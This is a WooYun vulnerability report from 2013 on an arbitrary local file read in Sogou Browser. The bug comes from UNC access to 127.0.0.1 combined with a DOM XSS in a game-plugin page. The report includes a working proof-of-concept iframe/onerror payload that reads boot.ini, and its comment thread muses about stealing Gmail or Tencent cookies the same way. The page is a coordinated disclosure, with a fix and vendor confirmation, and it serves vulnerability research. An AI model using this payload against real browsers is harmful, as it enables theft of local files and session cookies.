当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028832

漏洞标题:搜狗浏览器任意文件读取漏洞

相关厂商:搜狗

漏洞作者: 心伤的胖子

提交时间:2013-07-14 12:41

修复时间:2013-10-12 12:41

公开时间:2013-10-12 12:41

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-14: 细节已通知厂商并且等待厂商处理中
2013-07-15: 厂商已经确认,细节仅向厂商公开
2013-07-18: 细节向第三方安全合作伙伴开放
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-12: 细节向公众公开

简要描述:

搜狗浏览器对通过 UNC 访问 127.0.0.1 域限制一直比较宽松,之前就出现过本地文件存在 xss 漏洞,可以读取本地的任意文件的漏洞。结果是搜狗把本地文件的 xss 给修复,并没有对 UNC 访问 127.0.0.1 域做限制。

详细说明:

其实只要找个任意的本地文件的 xss 漏洞就可以通过该漏洞读取本地的任意文件。
搜狗浏览器安装玩游戏插件后会把插件解压,解压后的文件夹下有如下的文件
C:\Documents and Settings\Administrator\Application Data\SogouExplorer\Extension\com.sogou.gamecenter\0.6.0\html\balloon.html
该文件存在 dom xss 漏洞,如下代码,从 location.href 取数据没有经过处理直接 document.write 操作,造成 xss 漏洞。

<script type="text/javascript">
	var paramStr=location.href.split("?")[1]
	var debugUrl="http://fanjinhui.sogou-inc.com/d/balloom.html?"+paramStr
	var productUrl="http://wan.sogou.com/ad/gethtml.do?"+paramStr
	var theUrl=debug?debugUrl:productUrl;
</script>
<script type="text/javascript">			
	document.write('<iframe src="'+theUrl+'" id="ad-frame" frameborder="0" scrolling="no" width="294" height="190"></iframe>')
</script>


漏洞证明:

在任意页面上构造如下代码:

<iframe width=100% height=100% src='\\127.0.0.1\c$/DOCUME~1/Administrator/Application Data/SogouExplorer/Extension/com.sogou.gamecenter/0.6.0/html/balloon.html?"></iframe><img src=a onerror=eval(unescape(unescape("xmlhttp%253Dnew%2520ActiveXObject%2528%2522Msxml2.XMLHTTP.3.0%2522%2529%253Bxmlhttp.open%2528%2522GET%2522%252C%2522file%253A////127.0.0.1/c%2524/boot.ini%2522%252Cfalse%2529%253Bxmlhttp.send%2528%2529%253Balert%2528xmlhttp.responseText%2529%253B")))>'>


就会读取本地的 boot.ini 文件,测试 xp sp3 / windows 2003

sogou.png

修复方案:

限制 UNC 这种对 127.0.0.1 域的访问。

版权声明:转载请注明来源 心伤的胖子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-07-15 15:03

厂商回复:

收到,感谢提供

最新状态:

2013-10-12:确认已在新版本搜狗浏览器中修复此漏洞。

漏洞评价:

评论

  1. 2013-07-14 12:43 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    对了 如果都这样了 读取本地文件不如读取gmail的cookie好吧

  2. 2013-07-14 12:47 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    @xsser 猥琐至极 。。。猥琐至极啊。。。。。

  3. 2013-07-14 13:36 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    只要知道文件的位置都应该是可以获取其内容的。

  4. 2013-07-14 13:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @心伤的胖子 肯定读gmail啊 不解释

  5. 2013-07-14 13:55 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @心伤的胖子 可以直接远程读gmail

  6. 2013-07-14 14:01 | Master ( 路人 | Rank:29 漏洞数:10 )

    ..Mark

  7. 2013-07-14 14:52 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @xsser 要不试试去?哈哈!

  8. 2013-07-14 15:01 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )

    都揭露出来这可让b|jga怎么过呀...

  9. 2013-07-14 18:18 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @xsser gmail的cookie问题是你读回来了有啥用?又登录不了别人的GMAIL看信,而且gmail现有的检测机制,发现你中途ip变了,直接锁好要手机验证码。

  10. 2013-07-14 18:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @猪猪侠 那就读腾讯的,尽管有点没追求

  11. 2013-07-14 21:45 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    瘦子回来了,瘦子是否变成了胖子?究竟真相如何?凶手究竟是谁?请关注明晚《乌云访谈》之《瘦子的不归路》。

  12. 2013-07-14 21:51 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @xsser 读wooyun的比较好

  13. 2013-07-14 22:15 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @小胖胖要减肥 好主意。。

  14. 2013-07-15 10:35 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @鬼魅羊羔 额,我是胖子。

  15. 2013-07-15 11:26 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    @心伤的胖子 @小胖胖要减肥 一直好奇,你们俩是什么关系。。